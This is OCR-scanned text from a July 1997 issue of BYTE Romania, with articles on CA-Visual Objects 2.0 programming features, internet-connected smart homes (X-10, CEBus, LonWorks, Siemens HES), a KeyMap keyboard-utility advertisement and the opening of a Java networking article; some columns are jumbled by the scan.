menţionat, că, dacă programatorul nu este
mulțumit cu nici una din functionarile pre-
definite, este liber să-și implementeze -
folosind de mecanismul Notify prezentat în
următoarele - propria metodă de control.
CCNone. Serverul de date nu asigură de
la sine nici un serviciu de lock-ink.
CCOptimistic. Blocările nu sunt perma-
nente. Înainte de a aplica o modificare, arti-
colul este recitit şi, dacă este identic cu imagi-
nea păstrată în memorie, se blochează și se
aplică modificările. Dacă sunt diferenţe, se
raportează eroare si noile valori se propagă
către fereastra de date.
CCStable. Articolul curent vizualizat (în
mod BrowseView rândul curent) este blo-
cat în mod continuu.
CCRepeatable. Toate articolele care au
fost odată vizualizate se menţin în stare blo-
cată. Astfel, se asigură ca la o nouă
vizualizare datele sunt nemodificate.
CCFile. Toate aticolele serverului, din
selecția curentă, sunt blocate. Acesta nu este
util în general pentru fişiere întregi, pentru
că este echivalent cu un FileLock, dar se
recomandă folosirea ei pentru servere legate
prin relaţia SetSelectiveRelation (vezi sub-
ferestre de date).
11. Mecanismul Notify. Cum am mai
discutat, relaţia client-server este o relație 1
la n, adică unui server de date i se pot ataşșa
mai multe ferestre de date, sau clienți. În
fiecare fereastră se vizualizează un subset de
câmpuri al aceloraşi articole. O modificare a
stării serverului trebuie să se reflecte la nivelul
fiecărui client în parte. În acest scop, clienţii
serverului trebuie cumva anunţaţi asupra
modificării (sau tentativei de modificare).
Clienţii unui server de date pot fi înregis-
traţi şi de-înregistrați, fără nici o restricţie.
Singura condiţie, ca un obiect să fie recunos-
cut ca şi client, este ca acesta să aibă definită
metoda Notify().
Declanșarea unui eveniment atrage după
sine trimiterea unui mesaj către fiecare client
în parte. Metoda Notify() al obiectelor client
este invocată cu un parametru care specifică
natura evenimentului. (De exemplu, Field-
Change, IntentToMove, RecordChange,
GoTop, FileChange, RelationChange, ...).
Folosind faptul că obiectul client nu trebuie
să fie o specie anumită de fereastră, dar tre-
buie să dispună de o metodă Notify(), se pot
formula soluţii extrem de elegante la cele mai
diverse probleme. (Vezi, de exemplu, tema
unui alt articol, despre ComboBox-uri conec-
tate on-line la același server de date...)
12. HyperLabel. În filozofia CA-Visual
Objects, majoritatea claselor, chiar dacă nu
se impune, se permite folosirea unui sistem
evoluat de etichetare. Obiectul HyperLabel,
atașat unui alt obiect, conţine informaţii des-
pre obiectul gazdă. Astfel, se păstrează nume-
le, numele ca simbol (NameSym), eticheta
(Caption), descrierea (Description) si contex-
tul pentru WinHelp (HelpContext) ale obiec-
tului.
Această etichetare are rol multiplu. Pe de
o parte joacă rol la vizualizarea unui control
de date (eticheta se afişează în fața controlu-
lui, descrierea pe linia de stare, iar contextul
serveşte la identificarea paginii de Help), sau
la controale de comandă numele/numele sim-
bolic din HyperLabel determina numele eve-
nimentului. Schimbând, de exemplu, în mod
dinamic numele unui PushButon, se generea-
zĂ automat alt eveniment la apăsarea acestui
buton.
13. Send(). Este posibilă trimiterea unui
mesaj într-un mod indirect, folosind funcția
Send(). Sintaxa la apel a funcţiei este urmă-
toarea:
Send([], ,
[]) ---> uValue.
Treaba devine interesanta in momentul
in care programatorul constientizeaza ca
numele metodei de invocat nu trebuie
cunoscut in momentul compilarii. Mai mult,
numele simbolic al metodei de invocat se
poate „compune din mers“. De menţionat
că, folosind funcţia IsMethod() se poate
interoga obiectul în cauză, indiferent dacă
> CARET [XP FACIDREI]
lor, în contextul celor ce urmează, este
acelaşi, deci nu vor fi tratate separat.
Încuibarea controalelor OCX se poate face
on-the-fly; ca sistemul să poată să gestioneze
asemenea obiecte, este necesar ca acesta să fie
capabil să interogheze interfaţa lor: metodele,
modul de apel al metodelor, variabilele de
instanță. Din momentul în care aplicaţia dis-
pune de această interfață, ea poate lucra cu
obiectele respective ca și cu obiecte proprii.
Aplicația standard este capabilă să insere-
ze, în câmpurile de tip OLE ale fişierelor,
date obiecte OLE, fie folosind direct
metodele specifice containerelor OLE, fie
folosind dialogurile standard de Insert-,
respectiv Paste OLE Object.
15. OLE Automation Server. Unul din
mecanismele OLE 2.0 se materializează în
definirea unui protocol de interogare a
macro-limbajului, prin care o aplicaţie poate
fi programată din exterior. (OLE Automa-
tion standardizează doar protocolul de
interogarea macro-limbajului, şi nu macro-
limbajul în sine!)
Următoarea secvenţă de cod foloseşte pro-
gramul Word pentru a demonstra lansarea
unui Automation Server. Deoarece serverul
se rulează în spate, invizibil, doar fereastra
„ HelpAbout modificată se va vizualiza.
FUNCTION Start()
LOCAL oAuto AS OLEAutoObject
oAuto:=OLEAutoObject{"word.basic"}
oAuto:HelpAbout(;
"CA Word Version 2000 for VO",;
// AppName :
are sau nu definita metoda cu numele speci-
ficat. Ca să fie şi mai elegant, folosind două
funcţii similare se pot interoga/adresa
chiar şi metodele unei super-clase.
14. Obiecte şi controale OLE. După cum
am mai spus, sistemul este compatibil OLE
2.0 și suportă, pe lângă încuibarea obiectelor,
si inserarea în ferestre a controalelor OLE -
numite controale OCX. Comportamentul
"Copyright 1700-2001",; //
AppCopyright
CANA SUG ODTeCESie Orgs LA
AppUserName
"OLE Sample",; //
AppOrganization i
"ABCDEFG"; //
AppSerialNumber)
Dezavantajul metodei configurării la
IULIE 1997 BYTE Romania 101
“Medii de dezvoltare
runtime este că programatorul trebuie să
cunoască, în momentul scrierii codului inter-
faţa serverului (în acest caz existența metodei
HelpAbout și sintaxa apelului), care se va
conecta doar în timpul rulării aplicaţiei. Avan-
tajul este, evident, flexibilitatea obținută.
Automatizări - Mediul de
Dezvoltare Vizual
Din punctul de vedere al productivității, joacă
un rol deosebit de important prezența unel-
telor de dezvoltare vizuale (evident din cate-
goria WYSIWYG evoluate...) şi a genera-
toarelor de cod automate. De importanță
similară sunt şi uneltele care servesc la extin-
derea mediului de dezvoltare. Bineînţeles, nu
putem găsi perfecțiunea în nici un generator
de cod (cu excepţia celor umane...), dar se
poate pretinde un nivel oarecare, calitativ, de
la medii de dezvoltare puţin mai serioase.
16. Funcţia Import- Servere de Date. Atât
editorul DBServer, cât și editorul SQL Ser-
ver construiesc clasa specifică sursei de date.
Clasa nouă moștenește toate proprietățile
clasei server, dar, în plus, dispune de varia-
bilele de instanță, de metodele acces și assign
pentru fiecare câmp de date în parte.
Rezultatul funcțional obținut este echiva-
lent cu ceea ce se obţine la auto-configurare
102 BYTE Romania IULIE 1997
Visual Objects 2.0
în momentul executării, dar intern este total
diferit. În timp ce la auto-configurare struc-
tura sursei se reflectă într-o structură virtu-
ală, clasa generată de editor prin specializare
reflectă fizic structura sursei.
Avantajul generării claselor, în timpul com-
pilării, se simte nu numai la viteza de execuție,
dar şi la posibilitatea verificării corectitudinii
codului - din punctul de vedere al existenţei
şi proprietăților câmpurilor de date.
Evident, cele descrise pentru un DBSer-
ver sunt total valabile şi pentru familia de
clase specifice surselor de date SQL.
17. AutoLayout- Editorul de Ferestre. Nu
se pot închipui aplicaţii economice care să
prelucreze date sub o formă sau alta, dar să
nu afişeze rezultate pe ecran. Afişarea datelor
fără ferestre de date se face doar în situații
mai rare. Ca urmare, se poate afirma că nu
există aplicaţie la dezvoltarea căreia să nu se
folosească editorul de ferestre.
Folosind funcţia AutoLayout a editorului,
este posibil să se specifice serverul de date la
care se va conecta fereastra. Ca urmare a
comenzii, se vor genera, în mod automat,
pe lângă un design vizual, şi entităţile de
resurse, controalele de date, precum și codul
pentru gestionarea controalelor de pe fereas-
tră corespunzătoare câmpurilor serverului.
COMPETITIA DEALERILOR
a ne m]
Inkjet Printers. |
Laserjet Printers
Editorul permite modificarea manuală, în
mod independent, a celor două moduri de
vizualizare - FormView şi BrowseView; deci,
design-urile generate automat servesc drept
punct de pornire pentru programator.
Bineînţeles, pentru a păstra independența
totală a codului generat, în mod automat și
a codului scris manual, trebuie să se respecte
anumite reguli de joc - dar acestea nu sunt
importante în acest moment.
18. Generatorul de Meniuri. Majoritatea
aplicaţiilor oferă un set comun de comenzi
meniu. Acestea se oferă sub forma unor meni-.
uri standard predefinite, care, opţional, pot fi
adăugate la meniul editat. (Aceste elemente
opţionale sunt File, Edit, View, Window şi
Help).
Dat fiind faptul că meniurile standard ge-
„nerează evenimente standard, multe comenzi
din meniu au metodele corespondente deja
definite la nivelul ferestrei shell sau a ferestre-
lor de date. (De exemplu, FileOpen, FileClo-
se, FileExit, Go Top, SkipPrevious, SkipNext,
GoBottom, FormView, BrowseView, Help).
Cum s-a mai spus în paragrafele anterioare,
structura ferestrei de date, în esență, dublează
structura serverului de date atașat. Astfel se
explică prezenţa de exemplu a metodelor
de navigare în baza de date (Skip~, Go~).
19. Generator de Clase - Controale OCX.
Pentru a insera Controale OCX în ferestrele
aplicaţiei se pot folosi de mecanismele run-
time descrise mai înainte, sau se poate folosi
generatorul de clase specializat la clasele
OCX, care dau naştere la clasele specifice
şi metodele de interfaţare a controlului
OCX. Astfel, se obţine o interfaţă conform
standardelor CA-Visual Objects.
20. Generatoare de Clase - OLE Auto-
matin Server Generator. Cum s-a mai dis-
cutat, OLE Automation nu reprezintă un
standard de comunicare inter-aplicaţii, doar
(sau poate mai mult prin aceasta?) un stan-
dard de interogare a interfeţei unei aplicații
zise compatibil OLE Automation. Prin
interogare, folosind macro-limbajul de pro-
gramare al aplicaţiei, sistemul obţine infor-
maţiile necesare, pentru a genera propri-
etăţile şi metodele claselor specifice care
asigură o interfațare în stil VO a aplicaţiei.
Rezultatul generării va fi o clasă - sau mai
multe clase - prin care aplicația străină poate
fi controlată, conform sintaxei şi semanticii
limbajului CA-Visual Objects. Eleganţa con-
stă în generarea acestei interfeţe
Într-un viitor articol, se vor analiza aces-
te mecanisme automate, pe rând, exemplifi-
când eleganța limbajului, si utilitatea autom-
atizărilor - prin exemple de cod concrete.
Istvân Lâsal6 este general manager la Networks
ltd. Oradea și poate fi contactat la istvanQle-
go.soroscj.ro.
Locuinţe inteligente
conectate la Internet
În curând aparatele de uz casnic din casele dumneavoastră
vor putea fi conectate între ele și chiar la Internet.
Aceasta pare a fi locuinţa inteligentă a viitorului, iar acest viitor nu e departe.
De Peter Corcoran
ocuinta inteligentă a fost multă vreme un vis al dome-
niului SF, amplificat de imagini din filme ca 2001: O
odisee a spaţiului . Dar anul 2001 se apropie, iar
locuinţele noastre încă nu prea dau semne de inteli-
genta... Sau nue asa?
În realitate, aparatele moderne individuale cum ar fi televizorul,
cuptorul cu microunde și sistemele de alarmă deja conţin un
microprocesor (sau unitate centrală de prelucrare, CPU) , la fel ca
şi celeca receptoarele radio, telefoanele mobile $i majoritatea cea-
surilor. Şi cu toate că fiecare dintre aparate este programat pentru
un obiectiv specific, ele sunt capabile să conlucreze în beneficiul con-
sumatorului. lată esența conceptului de locuinţa inteligentă.
În cazul în care toate aceste mici „inteligențe“ ar putea comuni-
ca între ele prin intermediul unei reţele şi ar lua decizii în comun,
locuinţele dumneavoastră ar deveni dintr-o dată mai deştepte. O
metodă simplă ar fi interconectarea acestor aparate folosind rețeaua
electrică a locuinţei (unde majoritatea aparatelor sunt deja legate).
Desigur, anumite automatizări domestice au fost posibile încă de
la începutul erei computerului. Aceasta însemna, pentru cei ce își
puteau permite, instalarea unui computer dedicat special acestui
scop, sau oaltă formă de inteligenţă centralizată conectată prin inter-
mediul cablurilor la diferiți senzori şi întrerupătoare dispersaţi în
întreaga locuință. Dar necesitatea unui hardware specializat pre-
cum şi a unor instalatori experimentați a făcut ca aplicarea acestor
genuri de automatizări să fie dificilă şi costisitore. În plus, controllerul
central ar putea fi suprasolicitat iar căderea sa ar atrage după sine
căderea întregului sistem.
Astăzi, în majoritatea locuinţelor avem o formă de inteligență dis-
tribuită, ca şi cum am avea câte un PC pe fiecare masă, în loc să avem
un singur mainframe care să coordoneze toate aparatele. Astfel, pro-
cesorul din alarmă se preocupă de securitate, în timp ce termosta-
tul controlează încălzirea şi aerul condiţionat. Fiecare aparat
funcționează eficient şi este invulnerabil la defecţiunea celuilalt, dar
dezavantajul constă în faptul că nici unul dintre aparate nu are acces
la informaţiile, resursele altora.
În cazul în care aparatele ar fi interconectate între ele cu ajutorul
unei rețele, ele ar putea funcţiona independent, dar ar putea să comu-
nice şi să-şi împartă resursele. De exemplu, una dintre „resursele“
sistemului de securitate ar putea fi un detector de mișcare situat în-
tr-una din camerele locuinței. Când este detectată o mișcare, con-
trollerul sistemului de securitate verifică dacă alarma este activată,
iar în caz afirmativ, declanșează alarma.
Dar dacă sistemul de securitate face parte din rețeaua locuinţei,
acestuia îi poate fi atașată o simplă interfaţă, care în momentul detec-
tării unei mișcări trimite un semnal de activare. Comutatorul de
lumină (făcând parte şi el din rețea) din camera unde s-a detectat
mişcarea, primeşte acest semnal și va răspunde prin aprinderea
luminii. Un termostat inclus în rețea va porni încălzirea și va trage
draperia în momentul fn care ati întrat în cameră. În acest mod
rețeaua din locuință poate folosi o resursă partajată, în acest caz
aparţinând detectorului de mișcare.
În zilele noastre, producătorii lucrează la crearea unor compo-
nente inteligente care să poată fi conectate automat la o astfel de
rețea (plug&play). Aceste produse de larg consum nu ar necesita
programare prealabilă: ajunge doar să fie conectate şi devin părți
ale rețelei din locuinţa inteligentă.
Locuinţă pe rețea
În același mod în care electricitatea a transformat gramofonul în
hi-fi, cutiile cu gheață în frigidere și felinarele în becuri, Internetul
va revoluţiona echipamentele de larg consum, de la computere şi
televizoare până la aparatele din bucătărie și automobile.
Nicholas Negroponte, celebrul guru de la MIT, apreciază că până
în anul 2000 „populaţia“ Internetului va atinge cifra de un miliard,
începând cu utilizatorii de computere si ajungând până la con-
sumatorii obişnuiţi. Dar pentru a-i atrage pe aceştia din urmă, Inter-
netul va trebui să fie accesibil aparatelor cu care aceştia sunt obișnuiți.
Însă aparatele casnice, spre deosebire de calculatoarele perso-
nale, sunt în general specializate pentru îndeplinirea unui singur
scop, sunt ieftine şi uşor de folosit. Unii speculează că această
nepotrivire ar putea fi rezolvată cu ajutorul unui dispozitiv hibrid,
un fel de calculator de rețea ieftin sau un aparat de informare, cu
ajutorul căruia s-ar reduce diferența existentă între computere şi
aparatele de uz casnic.
Un astfel de dispozitiv ar putea fi o îmbunătăţire importantă la
produsele electronice din locuință, dar crearea acestui nou gen de
produs şi acceptarea lui de către consumatori se pare că va fi un pro-
ces prea lent ca să țină pasul cu expansiunea Internetului.
Ca alternativă, am putea conecta aparatele casnice la Internet! La
urma urmei televizoarele, telefoanele, automobilele, chiar și
aparatele din bucătărie, conţin deja multe dintre componentele nece-
sare pentru conectivitate la reţea, în special microprocesoare şi
memorie. Conform firmei Motorola Semiconductor, noile auto-
mobile de vârf ale prezentului conţin până la 500 cipuri.
Imaginati-va o lume in care toate aparatele din locuința dum-
neavoastră interacționează pentru a vă oferi serviciile și informații-
IULIE 1997 BYTE Romania 103
Internet
Case inteligente
Companiile de telecomunicaţii, furnizorii de programe TV prin cablu și
firme prestatoare de servicii publice deja investesc în infrastructura de
comunicaţii necesară. Fiecare producător prevede o mare șansă pen-
tru produse și servicii noi livrate direct în locuinţa inteligentă a viitorului
apropiat: orice, începând de lafilme la cererea clientului până la cumpără-
turile interactive.
„ Darprodusele generaţiei următoare trebuie să fie capabile să inter-
acționeze cu produsele de la diferiţi fabricanți și chiar cu produsele altor
industrii. Acest lucru implică un standard acceptat. Pe piața curentă
există câteva tehnologii concurente pentru controlul reţelelor din locuință
(sau „reţele locale domestice“).
Prima a fost X-10 system. Dezvoltată în anii '70 de firma scoțiană
Pico Electronics, era primul modul comercial care putea controla ilu-
minarea și aparatele de uz casnic prin intermediul reţelei de curent e-
lectric. Folosind ca purtător tensiunea de 60 (sau 50) Hz, această abor-
dare implica emiterea unui impuls de 120 KHz atunci când tensiunea
trecea prin zero; un impuls echivala cu cifra '1! iar absenţa lui cu cifra
'0'. Fiecare unitate putea fi identificată individual, iar comenzile simple
cuprindeau ON, OFF, DIM, BRIGHT și ALL UNITS OFF. Pentru a tri-
0.8 secunde într-un mediu de 60 Hz.
Azi, X-10 este un standard și un producător. Acesta susţine că sis-
temul a fost instalat în peste 4 milioane de locuinţe iar produsele firmei
(cum arfi întrerupătoare de lumină, sisteme de telecomandă și de secu-
ritate) sunt comercializate de firme ca Radio Shack și Honeywell.
Tehnologia X-10 nu este scumpă, iar preţul de vânzare al tele-
comenzilor pornește de la circa 15 dolari. Însă comunicațiile sunt uni-
directionale, iar X-10 nu sprijină comunicațiile prin cablutorsadat (UTP),
-cablu coaxial, unde infraroșii, frecvenţe radio și fibre optice. Astfel că,
proprietatea lui Amp Incorporated și Molex Incorporated). Acest stan-
dard acoperea iniţial inteligenţa centralizată precum și noile elemente
„atât cu CEBus, cât și cu LonWorks (vezi mai jos) la crearea de hard-
ware si componente pentru locuintele existente. Tehnologia Smart
House este foarte proprietară și orientată către dealeri, instalarea și
întreţinerea necesită personal calificat și unelte speciale, astfel încât
multe companii și-au pierdut interesul în ea.
Între timp, în 1984, EIA (Electronics Industry Association) a con-
statat necesitatea existenţei unui standard mai simplu decât X-10.
esenţă, CEBus definește protocoale ce facilitează comunicarea între
Rețele casnice - încotro?
existân 1 4 miliarde de posibilităţi. Standardul mai oferă un limbaj prin
mite un semnal ce conţinea atât adresa cât și eoande £ erau necesare ~
primește licenţa pentru folosirea siglei CEBus.
în 1987, NAHB (National Association of Home Builders) din Statele
“Unite a dezvoltat un concept pentru controlul locuinței, care a evoluat.
„într-o afacere comercială, numită Smart House (tehnologia este acum _
„care cuprinde toate elementele de comunicaţie (hardul și protocoalele).
„. latînoriceaparatelectrocasnic și comunică cabluri de alimentare, cabluri
de hardware și cablaj pentru locuințe noi. Mai nou, Smart House lucrează
Inginerii reprezentând companiile membre ale EIA au creat CEBus (Con-
sumer Electronic Bus standard), lansat pe piața mondială în 1992. În
produsele electronice prin cabluri de alimentare, UTP, cabluri coaxiale,
unde infraroșii, frecvenţe radio și fibre optice. Oricine, de oriunde, are
acces la aceste specificaţii și crea produse care satisfac standardul |
CEBus. Acest standard se referă și la elemente cum ar fi modulatiile
cu spectru larg prin cablurile de curent electric (adica: se incepe mod-
ularea pe o anumita frecventa iar pe parcursul ciclului de modulare
frecvenţa se schimbă. Pentru detalii tehnice . ansultati ).
Adresele dispozitivelor sunt setate hardware de catre fabricanți, :
care se pot defini controale orientate-obiect cuprinzând comenzi ca
înainte, înapoi, pauză și scăderea - creșterea temperaturii cu un grad.
Actualmente, elementele de comunicaţie (hardul, limbajul si protocolul)
constau dintr-un set de cipuri produse și comercializate de Intellon
Corp. din Florida ().
Marca inregistrata CEBus este detinuta de EIA iar cercetarile sunt
supravegheate de CIC (CEBus Industry Council), 0 organizatie non-
profit printre membrii căreia se numără Microsoft, IBM, AT&T Bell
Labs etc. Oricine poate deveni membru al acestei organizaţii, plătind o
taxă anuală și îndeplinind anumite cerinţe prealabil stabilite.
Nu există restricții în privinţa folosirii standardului CEBus, dar CIC
dezvoltă un laborator de testare ce va fi întreţinut din sumele încasate
pentru testarea compatibilităţii produselor cu standardul CEBus. Pro-
ducătorii sunt încurajați să folosească laboratorul pentru a testa con-
formitatea la standard și performanţa produselor într-un. mediu de rețea
domestică. Dacă obține atestarea, producătorul plătește o ja și
_ Lon Works, un alt standard, a fost propus de Echelon Gora dial
o companie privată fondată în 1990 de Mike Markkula, unul dintre fonda-
torii lui Apple Computers. La baza acestui standard stă un 'Neuron chip’,
necesare pentru ca produsele să poată comunica în rețea. Cipul Neu-
ron este fabricat sub licenţă de către Motorola și i Toshiba, poate fiinsta-
torsadate, cabluri coaxiale, unde infrarosii, frecvente radio sifibre optice.
Echelon vinde componente Lon Works, cum ar fi transceivere, module,
routere si mediul de dezvoltare pentru chipul Neuron. Ca sila CEBus,
transmisiunile din Lon Works se bazează pe pachete de date cu lungime.
variabilă (pentru detalii vezi ).
le de care aveţi nevoie, când aveți nevoie...
frigiderul simte golirea cutiei de lapte si
înștiințează magazinul local să adauge lapte
la lista alimentelor livrate zilnic, în timp ce
prăjitorul de pâine vă anunţă prin interfonul
locuinţei că pâinea dumneavoastră... s-a ars?
Dintr-o dată, o largă varietate de produse
şi servicii noi sunt disponibile pentru oricine
posedă o reţea electrică în locuință şi o li-
nie telefonică prin care să conecteze locuința
la Internet. Promisiunea supremă a legării
în reţea a aparatelor noastre casnice nu este
creșterea utilității acestora, ci o creştere a
calităţii vieţii noastre.
În momentul de față tindem să persona-
lizăm fiecare produs sau serviciu utilizat:
numele din agendă, numere de telefon rapid
accesibile, posturi setate în memoria radio-
104 BYTE Romania IULIE 1997
ului, pozitia scaunelor din automobil, ziarele
la care ne abonăm, semnele de carte din na-
vigatorul nostru Web.
Aceste preferinţe reflectă cine suntem iar
posibilitatea de a le alege contează pentru
noi, ca indivizi şi consumatori. Aparatele
casnice ale zilelor noastre funcționează inde-
pendent, sunt personalizate manual și au o
accesibilitate limitată. Dar aparatele viitoru-
lui, legate la Internet, vor conlucra între ele,
vor fi personalizate în mod automat şi vor
avea o accesibilitate globală.
Deja se conturează alianţe printre marii
producători de electronică de larg consum,
acoperind diferite sisteme electronice apli-
cate în locuințe, jocuri, echipamente de rețea
şi telefoane. În curând aceste parteneriate
vor fabrica produsele de larg consum care
vor defini stilul de viață al secolului următor.
Abia atunci vom putea spune ca locuința
inteligentă se află chiar după colţ....atribuţii-
le zilnice din locuinţă vor fi automatizate pe
măsură ce aparatele casnice vor deveni
suport pentru o gamă largă de servicii
extinse. Prăjitorul de pâine al zilei de mâine
va „şti“ cum să prăjească fiecare tip de pâine,
se va informa de la ceasul deșteptător când
să înceapă prăjirea pâinii iar senzorul său
termic poate prelua si funcția de alarmă la
incendiu în bucătărie! Dacă un simplu prăji-
tor de pâine va putea să facă toate acestea,
ce vor putea face alte aparate?
Dr. Peter Corcoran este profesor de electronica
și calculatoare la UCG.Poate fi contactat prin
e-mail la adresa: pcorQeek.ucg.ie
Case inteligente
Internet
Economiseste-ti banii !
Furnizorii incearca influentarea obiceiurilor legate de consumul de
energie ale beneficiarilor prin programe gen DMS (demand-side-ma-
nagement). De exemplu, furnizorii de energie electrică au de aface peri-
odic, în orele de vârf, cu un consum de energie care le solicită capaci-
tatea de producţie aproape la maxim. În majoritatea cazurilor, aceste
cerințe de energie ar putea fi satisfăcute dacă beneficiarii și-ar decupla
de la rețeaua electrică unele aparate neesențţiale pe durata orelor de
vârf. i
O soluţie ar fi practicarea unor preţuri de energie diferenţiate în funcţie
de perioada de consum, astfel că la începutul perioadelor de vârf furni-
zorul trimite un semnal electronic reţelei locuinţei comunicând că „prețul
energiei urmează să crească“. După acest semnal, conform instrucțiu-
nilor predefinite de locatari, activităţile neesenţiale consumatoare de
energie pot fi sistate până la restabilirea preţului scăzut al energiei
electrice.
Europa inteligentă
lată câteva dintre proiectele bazate pe CEBus, dezvoltate în Europa
de firma norvegiană IT & Process:
*unsistem de administrare pentru restaurante folosind contoare elec-
trice cuplate la senzori de temperatură, termostate CEBus, etc., moni-
torizând folosirea energiei, securitatea, iluminarea și aparaturile.
* o reţea spitalicească, care ar oferi pacienţilor un acces rapid la
personal, ar controla iluminarea, securitatea și administrarea energiei,
mesaje către camere, indicând cele mai bune măsuri de luat în caz de
urgenţă și va furniza informaţii vitale echipelor de intervenție.
Treabă bună la UCG
În curând consumatorii vor avea acces la nenumărate surse de
informaţii rapide de pe Internet prin modemuri ultrarapide și prin TV-
cablu. Aceste semnale vor fi direcționate la TV prin intermediul unor așa-
numite „set-top-boxes“, care conectează televizorul obișnuit la Internet.
Cu toate cătehnologia reţelelor domestice, sau soluţiile „Home Bus“,
pot controla semnale TV și video prin cabluri coaxiale sau chiar prin fibre
optice, în funcţie de standardul folosit, încă nu există posibilitatea
administrării Home-Bus-ului din afara locuinţei. (De fapt, unul dintre avan-
tajele Home-Bus-ului este tehnologia de reţea locală pe care se bazează
- o abordare ieftină și ușor de folosit care se potrivește foarte bine pro-
duselor de larg consum).
În orice caz, dacă multiple informaţii externe sunt direcționate pe
acelaşi aparat din locuinţă, cum ar fi televizorul, pot apărea coliziuni de
date în interiorul locuinţei. Prin controlarea Home-Bus-ului, folosind o
‘punte Internet’, cercetătorii departamentului de inginerie electronică a
UCG caută metode de rezolvare a afluenţei de informaţii din locuință
pentru a evita haosul de pe reţea.
Echipa de la UCG a lucrat la proiecte legate de Home-Bus timp de
cinci ani, inclusiv la probleme legate de accesarea reţelei locuinţei prin
Internet (vezi situl web al echipei ) și a fost
distinsă recent cu premiul Forbairt Strategic Research Grant. Anul tre-
cut în iunie, la International Conference on Consumer Electronics din
Chicago, echipa a demonstrat primul acces intercontinental la o rețea
etc.
CEBus.
* un sistem de evacuare și salvare pentru hoteluri: acesta va trimite
HES
casa electronică Siemens
Siemens HES (Home Electronic System)
este sistemul electronic de administrare a
casei dumneavoastră cu care puteţi contro-
la, regla şi administra toate funcţiile apa-
ratelor electrice din casă, în mod fiabil. Pen-
tru acest lucru aveţi nevoie de o rețea internă
în casa dumneavoastră, reţea care inter-
conectează aparatura electrocasnică, sis-
temul de iluminat, sistemul de încălzire si
ventilație şi urmărirea luminii şi tempera-
turii din casă şi din exterior, controlul
valvelor de la robinetele de apă, sistemele
de acces şi securitate din casă prin instalaţia
electrică realizată conform magistralei stan-
dard european Instabus EIB. Standardul este
relativ vechi, de la începutul anilor'90 şi apli-
caţiile deja răspândite în Comunitatea Euro-
peană, dar şi în alte țări. Asociaţia EIBA
(http://www.eib.be) reuneşte principalii
producători, liderii domeniului de Home
and Building Automation şi Electrical Instal-
lation.
Siemens este un membru marcant al aso-
ciaţiei. Această firmă oferă o soluţie com-
pletă, elementul central de la HES fiind
Home Assistant. Acesta este un calculator
PC multifuncțional, cu ecran de comandă
prin atingere şi care poate exista într-unul
sau mai multe puncte de control din casă.
Evident HES oferă şi facilităţi de acces de pe
linie telefonică, ISDN, TV cablu și interfe-
ţe pentru aplicaţii telematice. Softul de lucru
cu HES și aplicaţiile incluse rulează pe sis-
temul de operare standard. Interfața apli-
caţiilor este o interfață grafică si are simbo-
luri intuitive care permit lucrul cu sistemul
prin simpla atingere a lor pe ecran. Este posi-
bilă astfel interacţiunea cu HES pentru con-
trolul tuturor funcţiilor, accesul la instrucți-
unile de operare sau apelul la furnizori
externi de servicii.
Aplicațiile obişnuite sunt cele de control
al cuptorului pentru gătit, mașinii de spălat
vase sau rufe, frigiderului, al iluminatului,
consumului de energie (sobe, climă), insta-
laţiei de securitate şi controlul sistemelor de
comunicaţie de la TV la telefon sau turn Hi-
FI.
Soluţia standard european respectată şi
de echipamentele Siemens este cea cu in-
stabus EIB. Toată instalaţia electrică trebuie
realizată conform standardului, iar magis-
trala de comandă este de fapt o linie serială
instalată în paralel cu liniile rețelei de ali-
mentare. Magistrala poate fi sub formă de
segment, stea sau arbore. Echipamentele de
sesizare și acţionare, cât şi echipamentele de
cuplare a acestora sunt conform standar-
dului menţionat. De fapt, echipamentele de
pe bus au procesor și memorie şi dispun de
interfeţe standard, fiind astfel posibilă dis-
tribuirea inteligenței (programului de apli-
caţie) şi conlucrarea între aceste echipa-
mente conform protocolului specificat de
standard.
Informaţii suplimentare despre clădiri
inteligente Siemens puteţi obține de la
Darvas Istvân, Siemens: bondar(Q sbs.de. BI
Darvas Attila este redactor la BYTE Româ-
nia,poate fi contactat prin e-mail la adresa:
adarvasQagora.ro
IULIE 1997 BYTE România 105
N
Designed for
SUFomts <— i
erai ilies
Romanian
KeyMap 2.0
- este utilitarul Windows 95 de care aveti nevoie pentru
a scrie comod in orice limba.
- permite configurarea software a tastaturii in functie de
necesitățile specifice oricărui utilizator.
- pentru fiecare layout atașat unei limbi și pentru fiecare
tastă a acestuia, puteți configura 4 caractere ce să fie
generate de acesta!
- se instalează și se configurează foarte ușor pentru
oricine a mai utilizat un produs Windows 95.
- Vă oferim de asemenea, la cerere, peste 180 de fonturi .
True Type sau Adobe Type (postscript), conţinând toate
caracterele specifice limbilor europene cu alfabet latin. = es
on: | „Cancel — | _ Apply |
40(0)65-166516
REX
www. hotsoft.ro/keymap
pentru
de font
le din 15 sept. 1996
Dore sc să cumpăr produsul, KeyMap2.0.
V-am expediat la BCR Tg.Mureș în contul nr. 4072032198 al S.C.HotSoft SRL Tg-Mureș, 100.000 lei (în care sunt incluse și taxele poștale),
cu mandatul poștal/ordinul de plată nr.: ..................... oaia iata de ee er din data de... tea „ pentru o licenţă a acestuia.
(Pentru licenţe multiple apelaţi la sediul firmei.) LI Doresc să-mi trimiteţi și factură,
Numele st prenume@le eee eine oua de Na ui aaa a Au, aaa ee ee e A ei FUNCHOS io A aceea eer erm ee er a mie a
ATEI, ca ao aa Aa aa a aa cicadas a ats aaa ara a Adresa sia pate ou da i a alai alu a Casa den, SEI ea tau EN aa Da e ee
Cod-poștal/tocalitățe: 2 aa tee ae cut tia aaa ale Telefon/Fax. oii ce ma ee pe aa ee ear vi baie a esua teana „let e dna Cu ea
Date pice male ee bine al e oa mee Ra aa ant iar SOM ee aoe eat HE eres calea eat aa dă ai aaa
Clasele java.net.*
Și în Java se comunică, nu-i aşa
De Pelin Nicoleta-Corina și Pelin Cristian-Florentin
imbajul Java a revoluționat modul de gândire a paginilor
Web. Paginile de Internet devin din ce în ce mai com-
plexe, mai atractive, cu un grad ridicat de interactivitate.
Un domeniu incitant pe care acest limbaj îl abordează cu
maturitate îl reprezintă comunicaţia între calculatoare. Prezentul
articol îşi propune să studieze clasele care se ocupă de acest subiect.
Definiţii
URL prescurtare pentru Uniform Reference Locator, este o referin-
ţă către un obiect pe World Wide Web. Aceasta referință nu mai
poate fi schimbată din momentul în care a fost creată. Funcţiile care
implementează acest concept în Java se găsesc în java.net.URL.
Socketul reprezintă o „mufa“ prin care 2 calculatoare pot schim-
ba date.
Adresa internet sau IP este adresa fiecărui utilizator conectat la In-
ternet. Acest tip de date este implementat în clasa java.net.InetAddress.
Portul reprezintă poarta fizică pe care comunică două calcula-
toare între care s-a stabilit o legătură. Evident, pentru o comuni-
